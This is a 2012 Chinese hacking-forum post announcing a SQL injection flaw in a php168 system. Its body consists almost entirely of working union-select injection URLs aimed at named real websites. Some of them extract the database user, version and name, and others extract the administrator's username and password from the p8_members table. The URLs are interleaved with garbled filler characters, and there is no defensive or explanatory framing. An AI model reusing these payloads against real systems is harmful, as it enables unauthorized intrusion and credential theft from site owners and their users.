找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2963|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--, x) K6 T# D# L6 j: ?
                                                         
. `! T9 p& J9 ^                                       1 ~: Z% E  i5 C- @: ]; S

: G6 @. \* c, d6 p
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
# `- p& Z& ^% x- W2 n2 z. d                                                     8 v: q) m- K! R6 i
                                                                  
4 V. B0 G( @. K, R                                                        + e2 i4 y7 N! @" k% v1 o
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
  U8 Q* B! u2 g0 V2 ~$ b6 N7 S7 s/ r% i' u" e/ h! ?9 X- P6 X
. U' V0 q* W! q( `$ L5 ~# e

. I1 C, E% w/ B. P: C                                                            3 H# ~+ g  ^+ k. s- Y0 P
/ E& d% N* n9 h' |2 \# z( l. o
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--- o& n6 h1 x& o8 ]' l5 {: k; Q

/ Y7 w4 x3 i! a! c8 s: v; K8 W: g) n! J4 x) |5 Z7 V: z

7 i* p: g& m, l$ }                                                                    4 a4 `/ }7 [2 x

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表